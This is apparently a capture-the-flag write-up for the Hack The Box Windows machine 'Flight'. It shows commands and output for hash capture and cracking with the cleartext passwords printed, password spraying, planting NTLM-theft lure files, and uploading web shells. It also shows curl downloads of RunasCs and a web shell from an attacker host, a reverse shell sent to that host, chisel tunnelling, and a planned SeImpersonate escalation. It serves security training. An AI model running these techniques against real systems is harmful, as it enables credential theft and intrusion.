Flight is a hard Windows machine that starts with a website with two different virtual hosts. One of them is vulnerable to LFI and allows an attacker to retrieve an NTLM hash. Once cracked, the obtained clear text password will be sprayed across a list of valid usernames to discover a password re-use scenario. Once the attacker has SMB access as the user s.moon he is able to write to a share that gets accessed by other users. Certain files can be used to steal the NTLMv2 hash of the users that access the share. Once the second hash is cracked the attacker will be able to write a reverse shell in a share that hosts the web files and gain a shell on the box as low privileged user. Having credentials for the user c.bum, it will be possible to gain a shell as this user, which will allow the attacker to write an aspx web shell on a web site that is hosted locally and by using chisel we can forward that port and get into our machine and we can get a shell and by using SetImpersoante privilege we can escalate to Administrator.
➜ Flight nmap -v 10.129.228.120 -sCV -oA nmap-out Nmap scan report for 10.129.228.120 Host is up (0.25s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) | http-methods: | Supported Methods: OPTIONS HEAD GET POST TRACE |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 |_http-title: g0 Aviation 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-15 17:35:47Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
In just a second i got a hit on my responder with svc_apache hash, and i used john to crack password.
1 2 3 4 5 6 7 8 9
➜ Flight john hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status S@Ss!K@*t13 (svc_apache) 1g 0:00:00:04 DONE (2024-11-15 07:35) 0.2421g/s 2582Kp/s 2582Kc/s 2582KC/s SADSAM..S42150461 Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed.
After cracking i got password of svc_apache:S@Ss!K@*t13, with that creds i enumerated smb shares and got few shares.
➜ Flight smbclient -L \\\\flight.htb\\ -U svc_apache Password for [WORKGROUP\svc_apache]:
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Shared Disk SYSVOL Disk Logon server share Users Disk Web Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to flight.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ➜ Flight smbclient \\\\flight.htb\\Users -U svc_apache Password for [WORKGROUP\svc_apache]: Try "help" to get a list of possible commands. smb: \> ls . DR 0 Thu Sep 22 16:16:56 2022 .. DR 0 Thu Sep 22 16:16:56 2022 .NET v4.5 D 0 Thu Sep 22 15:28:03 2022 .NET v4.5 Classic D 0 Thu Sep 22 15:28:02 2022 Administrator D 0 Mon Oct 31 14:34:00 2022 All Users DHSrn 0 Sat Sep 15 03:28:48 2018 C.Bum D 0 Thu Sep 22 16:08:23 2022 Default DHR 0 Tue Jul 20 15:20:24 2021 Default User DHSrn 0 Sat Sep 15 03:28:48 2018 desktop.ini AHS 174 Sat Sep 15 03:16:48 2018 Public DR 0 Tue Jul 20 15:23:25 2021 svc_apache D 0 Fri Oct 21 14:50:21 2022
5056511 blocks of size 4096. 1253840 blocks available smb: \> cd C.Bum smb: \C.Bum\> ls NT_STATUS_ACCESS_DENIED listing \C.Bum\* smb: \C.Bum\> cd ../svc_apache\ smb: \svc_apache\> ls . D 0 Fri Oct 21 14:50:21 2022 .. D 0 Fri Oct 21 14:50:21 2022 AppData DH 0 Thu Sep 22 16:16:56 2022 Application Data DHSrn 0 Thu Sep 22 16:16:56 2022 Cookies DHSrn 0 Thu Sep 22 16:16:56 2022 Desktop DR 0 Sat Sep 15 03:19:00 2018 Documents DR 0 Thu Sep 22 16:16:56 2022 Downloads DR 0 Sat Sep 15 03:19:00 2018 Favorites DR 0 Sat Sep 15 03:19:00 2018 Links DR 0 Sat Sep 15 03:19:00 2018 Local Settings DHSrn 0 Thu Sep 22 16:16:56 2022 Music DR 0 Sat Sep 15 03:19:00 2018 My Documents DHSrn 0 Thu Sep 22 16:16:56 2022 NetHood DHSrn 0 Thu Sep 22 16:16:56 2022 NTUSER.DAT AHn 262144 Mon Oct 31 23:26:27 2022 ntuser.dat.LOG1 AHS 124928 Thu Sep 22 16:16:56 2022 ntuser.dat.LOG2 AHS 124928 Thu Sep 22 16:16:56 2022 NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf AHS 65536 Thu Sep 22 16:17:08 2022 NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Thu Sep 22 16:16:56 2022 NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Thu Sep 22 16:16:56 2022 ntuser.ini HS 20 Thu Sep 22 16:16:56 2022 Pictures DR 0 Sat Sep 15 03:19:00 2018 PrintHood DHSrn 0 Thu Sep 22 16:16:56 2022 Recent DHSrn 0 Thu Sep 22 16:16:56 2022 Saved Games D 0 Sat Sep 15 03:19:00 2018 SendTo DHSrn 0 Thu Sep 22 16:16:56 2022 Start Menu DHSrn 0 Thu Sep 22 16:16:56 2022 Templates DHSrn 0 Thu Sep 22 16:16:56 2022 Videos DR 0 Sat Sep 15 03:19:00 2018
5056511 blocks of size 4096. 1253840 blocks available smb: \svc_apache\> cd Desktop smb: \svc_apache\Desktop\> ls . DR 0 Sat Sep 15 03:19:00 2018 .. DR 0 Sat Sep 15 03:19:00 2018 5056511 blocks of size 4096. 1253840 blocks available smb: \> exit ➜ Flight smbclient \\\\flight.htb\\Web -U svc_apache Password for [WORKGROUP\svc_apache]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Nov 15 13:27:00 2024 .. D 0 Fri Nov 15 13:27:00 2024 flight.htb D 0 Fri Nov 15 13:27:00 2024 school.flight.htb D 0 Fri Nov 15 13:27:00 2024
5056511 blocks of size 4096. 1253840 blocks available smb: \> cd school.flight.htb\ smb: \school.flight.htb\> ls . D 0 Fri Nov 15 13:27:00 2024 .. D 0 Fri Nov 15 13:27:00 2024 about.html A 1689 Mon Oct 24 23:54:45 2022 blog.html A 3618 Mon Oct 24 23:53:59 2022 home.html A 2683 Mon Oct 24 23:56:58 2022 images D 0 Fri Nov 15 13:27:00 2024 index.php A 2092 Thu Oct 27 03:59:25 2022 lfi.html A 179 Thu Oct 27 03:55:16 2022 styles D 0 Fri Nov 15 13:27:00 2024
5056511 blocks of size 4096. 1253840 blocks available smb: \school.flight.htb\> cd ../flight.htb\ ls smb: \flight.htb\> ls . D 0 Fri Nov 15 13:27:00 2024 .. D 0 Fri Nov 15 13:27:00 2024 css D 0 Fri Nov 15 13:27:00 2024 images D 0 Fri Nov 15 13:27:00 2024 index.html A 7069 Thu Feb 24 00:58:10 2022 js D 0 Fri Nov 15 13:27:00 2024
5056511 blocks of size 4096. 1253584 blocks available smb: \flight.htb\> exit ➜ Flight smbclient \\\\flight.htb\\Shared -U svc_apache Password for [WORKGROUP\svc_apache]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Oct 28 16:21:28 2022 .. D 0 Fri Oct 28 16:21:28 2022
5056511 blocks of size 4096. 1253584 blocks available smb: \> exit
Coudn’t find anything interesting from shares, so moving forward to find other users.
Got usernames from smb using valid creds of svc_apache and sprayed password of svc_apache with the all users found and got other hit on one other user S.Moon
Now we have READ, WRITE permission on Shared share so we can try to get creds of any other users by uploading ntlm_theft files. We can generate files by using ntlm_theft.py
➜ test smbclient \\\\flight.htb\\Shared -U S.moon Password for [WORKGROUP\S.moon]: Try "help" to get a list of possible commands. smb: \> recurse on smb: \> prompt off smb: \> put * * does not exist smb: \> put Autorun.inf test.asx test-(fulldocx).xml test-(includepicture).docx test.m3u test.rtf test-(url).url desktop.ini test-(externalcell).xlsx test.htm test.jnlp test.pdf test.scf test.wax test.application test-(frameset).docx test-(icon).url test.lnk test-(remotetemplate).docx test-(stylesheet).xml zoom-attack-instructions.txt smb: \> put * * does not exist smb: \> mput * NT_STATUS_ACCESS_DENIED opening remote file \test.pdf NT_STATUS_ACCESS_DENIED opening remote file \test.wax NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf NT_STATUS_ACCESS_DENIED opening remote file \test.asx NT_STATUS_ACCESS_DENIED opening remote file \test.lnk putting file test.jnlp as \test.jnlp (0.3 kb/s) (average 0.3 kb/s) putting file test.application as \test.application (1.5 kb/s) (average 1.1 kb/s)
I started my responder listerner and uploaded ntlm_theft files to Shared share and after few seconds i got a response back in my Responder with hash of other user c.bum, after cracking i got c.bum users password.
➜ Flight john hash2 --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Tikkycoll_431012284 (c.bum) 1g 0:00:00:03 DONE (2024-11-15 13:33) 0.2557g/s 2694Kp/s 2694Kc/s 2694KC/s TinyMutt69..Tiffani29 Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed. ➜ Flight
With c.bum’s creds we have write access to web share so we can upload a asp web shell and get a shell.
➜ Flight smbclient \\\\flight.htb\\Web -U c.bum Password for [WORKGROUP\c.bum]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Nov 15 13:37:00 2024 .. D 0 Fri Nov 15 13:37:00 2024 flight.htb D 0 Fri Nov 15 13:37:00 2024 school.flight.htb D 0 Fri Nov 15 13:37:00 2024
5056511 blocks of size 4096. 1252959 blocks available smb: \> cd school.flight.htb\ smb: \school.flight.htb\> ls . D 0 Fri Nov 15 13:37:00 2024 .. D 0 Fri Nov 15 13:37:00 2024 about.html A 1689 Mon Oct 24 23:54:45 2022 blog.html A 3618 Mon Oct 24 23:53:59 2022 home.html A 2683 Mon Oct 24 23:56:58 2022 images D 0 Fri Nov 15 13:37:00 2024 index.php A 2092 Thu Oct 27 03:59:25 2022 lfi.html A 179 Thu Oct 27 03:55:16 2022 styles D 0 Fri Nov 15 13:37:00 2024
5056511 blocks of size 4096. 1252831 blocks available smb: \school.flight.htb\> put shell.php putting file shell.php as \school.flight.htb\shell.php (0.4 kb/s) (average 13.1 kb/s) smb: \school.flight.htb\>
After uploading we can access that file from web page and we can get a shell using a normal powershell reverse shell and we get a shell of user svc_apache
1 2 3 4 5 6 7
➜ Flight nc -nvlp 1212 Listening on 0.0.0.0 1212 Connection received on 10.129.228.120 53863
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 11/15/2024 11:02 AM inetpub d----- 6/7/2022 6:39 AM PerfLogs d-r--- 10/21/2022 11:49 AM Program Files d----- 7/20/2021 12:23 PM Program Files (x86) d----- 11/15/2024 10:36 AM Shared d----- 9/22/2022 12:28 PM StorageReports d-r--- 9/22/2022 1:16 PM Users d----- 10/21/2022 11:52 AM Windows d----- 9/22/2022 1:16 PM xampp
PS C:\> mkdir Temp cd
Directory: C:\
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 11/15/2024 11:04 AM Temp
PS C:\> Temp PS C:\Temp> ls PS C:\Temp> curl 10.10.16.25:1337/RunasCs.exe -o RunasCs.exe PS C:\Temp> .\RunasCs.exe C.Bum Tikkycoll_431012284 cmd.exe -r 10.10.16.25:1234 [*] Warning: The logon for user 'C.Bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW() [+] Using Station\Desktop: Service-0x0-856ce$\Default [+] Async process 'C:\Windows\system32\cmd.exe' with pid 900 created in background. PS C:\Temp>
Since we have creds of C.Bum i tried using RunasCs.exe to get other shell and it worked and we got a shell as C.Bum
User c.bum
1 2 3 4 5 6 7 8 9 10 11
➜ Flight nc -nvlp 1234 Listening on 0.0.0.0 1234 Connection received on 10.129.228.120 63400 Microsoft Windows [Version 10.0.17763.2989] (c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami whoami flight\c.bum
C:\Windows\system32>
After checking network connection i found there is a port 8000 listening locally, and also we can see there is a folder named C:\inetpub\development so it will be some web servers. By using chisel i forwarded port 8000 to my local machin in port 8989.
➜ Flight chisel server --reverse -p 1338 -v 2024/11/15 15:22:37 server: Reverse tunnelling enabled 2024/11/15 15:22:37 server: Fingerprint qjzDZAxmyopYIyjjHepp/tGY+pmdLBP3tWafTwLDK3o= 2024/11/15 15:22:37 server: Listening on http://0.0.0.0:1338 2024/11/15 15:22:41 server: session#1: Handshaking with 10.129.228.120:51486... 2024/11/15 15:22:45 server: session#1: Verifying configuration 2024/11/15 15:22:46 server: session#1: Client version (1.9.1) differs from server version (1.10.1-0kali1) 2024/11/15 15:22:46 server: session#1: tun: Created 2024/11/15 15:22:46 server: session#1: tun: SSH connected 2024/11/15 15:22:46 server: session#1: tun: proxy#R:8989=>8000: Listening 2024/11/15 15:22:46 server: session#1: tun: Bound proxies
By using chisel i forwarded port 8000 to my local machin in port 8989, i got a web page
Since we can access this page so we can add a web shell page in C:\inetpub\development so we can access it from web page and c.bum has write permission on that folder.
C:\inetpub\development>curl 10.10.16.25:1337/cmd.aspx -o cmd.aspx curl 10.10.16.25:1337/cmd.aspx -o cmd.aspx % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1547 100 1547 0 0 847 0 0:00:01 0:00:01 --:--:-- 847
C:\inetpub\development>
After adding a nw web shell file in that i was able to access it from localhost:8989 and can execute commands too, by entering a simple powershell reverse shell we were able to get a shell back as iis apppool\defaultapppool
1 2 3 4 5 6 7
➜ Flight nc -nvlp 1290 Listening on 0.0.0.0 1290 Connection received on 10.129.228.120 51529
After checking privileges we can see, we have SeImpersonatePrivilege, so we can use Godpotato to get Administrator
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
PS C:\windows\system32\inetsrv> cd C:/ PS C:\> whoami /priv
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeMachineAccountPrivilege Add workstations to domain Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled PS C:\>
